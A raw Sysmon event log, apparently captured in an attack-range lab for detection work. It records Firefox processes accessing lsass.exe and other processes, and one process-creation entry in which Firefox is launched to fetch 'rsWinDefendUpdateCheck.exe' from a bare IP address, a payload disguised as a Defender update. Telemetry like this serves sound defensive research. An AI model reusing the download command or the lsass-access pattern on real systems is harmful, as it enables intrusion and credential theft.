Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048242Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.011{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048241Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.011{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048240Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.011{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048239Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.011{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000048238Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.009{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 17141700x800000000000000048237Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:38.008{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\chrome.3304.6.117887253C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000048236Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.005{FE4C2B44-E66B-63C7-9B06-00000000AF02}33044516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66D-63C7-A106-00000000AF02}876C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program Files\Mozilla Firefox\xul.dll+e77459|C:\Program Files\Mozilla Firefox\xul.dll+e86462|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+1a94a5b|C:\Program Files\Mozilla Firefox\xul.dll+1a93e85|C:\Program Files\Mozilla Firefox\xul.dll+1a968e2|C:\Program Files\Mozilla Firefox\xul.dll+17e5104|C:\Program Files\Mozilla Firefox\xul.dll+1ac03d9|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+16d888|C:\Program Files\Mozilla Firefox\xul.dll+16c717|C:\Program Files\Mozilla Firefox\xul.dll+46b6cd1|C:\Program Files\Mozilla Firefox\xul.dll+472a2ec|C:\Program Files\Mozilla Firefox\xul.dll+472b10d|C:\Program Files\Mozilla Firefox\xul.dll+20599f2|C:\Program Files\Mozilla Firefox\firefox.exe+1e99e|C:\Program Files\Mozilla Firefox\firefox.exe+2c9f8|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000048235Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.004{FE4C2B44-E66B-63C7-9B06-00000000AF02}33045548C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66D-63C7-A106-00000000AF02}876C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+9e834a|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+2581e76|C:\Program Files\Mozilla Firefox\xul.dll+1ab508d|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048234Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.000{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048233Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.000{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048232Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.999{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048231Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.999{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048230Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.999{FE4C2B44-DDF4-63C7-A004-00000000AF02}4700692C:\Windows\system32\csrss.exe{FE4C2B44-E66D-63C7-A106-00000000AF02}876C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000048229Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.999{FE4C2B44-E66B-63C7-9B06-00000000AF02}33045480C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66D-63C7-A106-00000000AF02}876C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+ac12|C:\Program Files\Mozilla Firefox\firefox.exe+6673|C:\Program Files\Mozilla Firefox\xul.dll+7a8fbe|C:\Program Files\Mozilla Firefox\xul.dll+9e365b|C:\Program Files\Mozilla Firefox\xul.dll+9e1625|C:\Program Files\Mozilla Firefox\xul.dll+9e934e|C:\Program Files\Mozilla Firefox\xul.dll+82fb43|C:\Program Files\Mozilla Firefox\xul.dll+17e59b8|C:\Program Files\Mozilla Firefox\xul.dll+17d1c3b|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+833d37|C:\Program Files\Mozilla Firefox\nss3.dll+7318c|C:\Program Files\Mozilla Firefox\nss3.dll+885b1|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000048228Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.999{FE4C2B44-E66D-63C7-A106-00000000AF02}876C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3304.5.1347069183\1029742967" -childID 4 -isForBrowser -prefsHandle 4528 -prefMapHandle 4516 -prefsLen 31532 -prefMapSize 234522 -jsInitHandle 888 -jsInitLen 246772 -a11yResourceId 64 -parentBuildID 20230112150232 -appDir "C:\Program Files\Mozilla Firefox\browser" - {047407d9-dd1c-4b8d-9d71-57ff57ab7081} 3304 "\\.\pipe\gecko-crash-server-pipe.3304" 4540 19fb93ca258 tabC:\Windows\system32\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2LowMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://45.139.105.143/d/rsWinDefendUpdateCheck.exe 10341000x800000000000000048444Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:39.957{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66E-63C7-A306-00000000AF02}1712C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000048443Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:39.957{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66E-63C7-A306-00000000AF02}1712C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000048442Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:39.957{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66E-63C7-A306-00000000AF02}1712C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000048441Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:39.955{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66E-63C7-A206-00000000AF02}5460C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000048440Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:39.955{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66E-63C7-A206-00000000AF02}5460C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000048439Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:39.955{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66E-63C7-A206-00000000AF02}5460C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000048438Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:39.954{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66D-63C7-A106-00000000AF02}876C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000048437Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:39.954{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66D-63C7-A106-00000000AF02}876C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000048436Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:39.954{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66D-63C7-A106-00000000AF02}876C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 23542300x800000000000000048435Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:39.839{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80416E1C2D40E825604506773FC23574,SHA256=21156F260EF34F16F10B6486033E0DB059764F5F81176415A3CD86B921D12640,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018896Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:39.910{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F1B0CC619B77A1D07AD36E1DCF4B073,SHA256=97CFE3BF632C33C0C6542B418DD3EF5EA646BF01ECC87385CB92A8A9395B8562,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000048434Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.528{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local60109- 354300x800000000000000048433Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.527{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local59167- 23542300x800000000000000048452Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:40.959{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=288847D7C4856561E6FBAD6B4A18EAE7,SHA256=99044FEBB63B883AD6917443CB93D21BE42415B3B1A7E90B0D591E454F0F9915,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 22542200x800000000000000048451Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 